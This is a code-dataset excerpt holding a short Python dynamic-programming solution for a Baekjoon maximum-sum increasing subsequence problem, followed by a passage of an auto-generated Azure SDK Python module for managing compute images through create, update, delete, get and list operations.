91554162b70e52b44dac5788af4f99b9d261c2e6 | 1a220abd21c56728aa3368534506bfc9ced8ad46 | /3.beakjoon/DP/BOJ_가장 큰 증가하는 부분 수열.py | f52f6d4ddeb092b4be6311015d24ddfacf7df44e | [] | no_license | JeonJe/Algorithm | 0ff0cbf47900e7877be077e1ffeee0c1cd50639a | 6f8da6dbeef350f71b7c297502a37f87eb7d0823 | refs/heads/main | 2023-08-23T11:08:17.781953 | 2023-08-23T08:31:41 | 2023-08-23T08:31:41 | 197,085,186 | 0 | 0 | null | 2023-02-21T03:26:41 | 2019-07-15T23:22:55 | Python | UTF-8 | Python | false | false | 340 | py | n = int(input())
nums = list(map(int,input().split()))
if n == 1:
print(nums[0])
exit(0)
LIS_sum = [0]*(n)
LIS_sum[0] = nums[0]
for i in range(1,n):
temp = 0
for j in range(i-1,-1,-1):
if nums[j] < nums[i]:
temp = max(temp, LIS_sum[j])
LIS_sum[i] = temp+nums[i]
print(max(LIS_sum)) | [
"whssodi@gmail.com"
] | whssodi@gmail.com |
942f086421c66cf688e405fc33af1707af5ebc2b | d7016f69993570a1c55974582cda899ff70907ec | /sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2022_03_01/operations/_images_operations.py | 2edb1f0d7e16c55f9a9d125bf0a0d5a541741cbe | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 45,959 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from ..._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_create_or_update_request(
resource_group_name: str, image_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"imageName": _SERIALIZER.url("image_name", image_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_update_request(resource_group_name: str, image_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"imageName": _SERIALIZER.url("image_name", image_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PATCH", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_request(resource_group_name: str, image_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"imageName": _SERIALIZER.url("image_name", image_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_request(
resource_group_name: str, image_name: str, subscription_id: str, *, expand: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"imageName": _SERIALIZER.url("image_name", image_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
if expand is not None:
_params["$expand"] = _SERIALIZER.query("expand", expand, "str")
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_by_resource_group_request(resource_group_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images",
) # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_request(subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/providers/Microsoft.Compute/images")
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class ImagesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.compute.v2022_03_01.ComputeManagementClient`'s
:attr:`images` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
def _create_or_update_initial(
self, resource_group_name: str, image_name: str, parameters: Union[_models.Image, IO], **kwargs: Any
) -> _models.Image:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Image] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "Image")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
image_name=image_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Image", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Image", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
@overload
def begin_create_or_update(
self,
resource_group_name: str,
image_name: str,
parameters: _models.Image,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.Image]:
"""Create or update an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param parameters: Parameters supplied to the Create Image operation. Required.
:type parameters: ~azure.mgmt.compute.v2022_03_01.models.Image
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Image or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def begin_create_or_update(
self,
resource_group_name: str,
image_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.Image]:
"""Create or update an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param parameters: Parameters supplied to the Create Image operation. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Image or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def begin_create_or_update(
self, resource_group_name: str, image_name: str, parameters: Union[_models.Image, IO], **kwargs: Any
) -> LROPoller[_models.Image]:
"""Create or update an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param parameters: Parameters supplied to the Create Image operation. Is either a model type or
a IO type. Required.
:type parameters: ~azure.mgmt.compute.v2022_03_01.models.Image or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Image or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Image] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
image_name=image_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Image", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
def _update_initial(
self, resource_group_name: str, image_name: str, parameters: Union[_models.ImageUpdate, IO], **kwargs: Any
) -> _models.Image:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Image] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "ImageUpdate")
request = build_update_request(
resource_group_name=resource_group_name,
image_name=image_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Image", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Image", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
@overload
def begin_update(
self,
resource_group_name: str,
image_name: str,
parameters: _models.ImageUpdate,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.Image]:
"""Update an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param parameters: Parameters supplied to the Update Image operation. Required.
:type parameters: ~azure.mgmt.compute.v2022_03_01.models.ImageUpdate
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Image or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def begin_update(
self,
resource_group_name: str,
image_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.Image]:
"""Update an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param parameters: Parameters supplied to the Update Image operation. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Image or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def begin_update(
self, resource_group_name: str, image_name: str, parameters: Union[_models.ImageUpdate, IO], **kwargs: Any
) -> LROPoller[_models.Image]:
"""Update an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param parameters: Parameters supplied to the Update Image operation. Is either a model type or
a IO type. Required.
:type parameters: ~azure.mgmt.compute.v2022_03_01.models.ImageUpdate or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Image or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Image] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
image_name=image_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Image", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, image_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
image_name=image_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
@distributed_trace
def begin_delete(self, resource_group_name: str, image_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes an Image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
image_name=image_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
@distributed_trace
def get(
self, resource_group_name: str, image_name: str, expand: Optional[str] = None, **kwargs: Any
) -> _models.Image:
"""Gets an image.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param image_name: The name of the image. Required.
:type image_name: str
:param expand: The expand expression to apply on the operation. Default value is None.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Image or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2022_03_01.models.Image
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
cls: ClsType[_models.Image] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
image_name=image_name,
subscription_id=self._config.subscription_id,
expand=expand,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("Image", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
}
@distributed_trace
def list_by_resource_group(self, resource_group_name: str, **kwargs: Any) -> Iterable["_models.Image"]:
"""Gets the list of images under a resource group.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Image or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
cls: ClsType[_models.ImageListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_resource_group.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
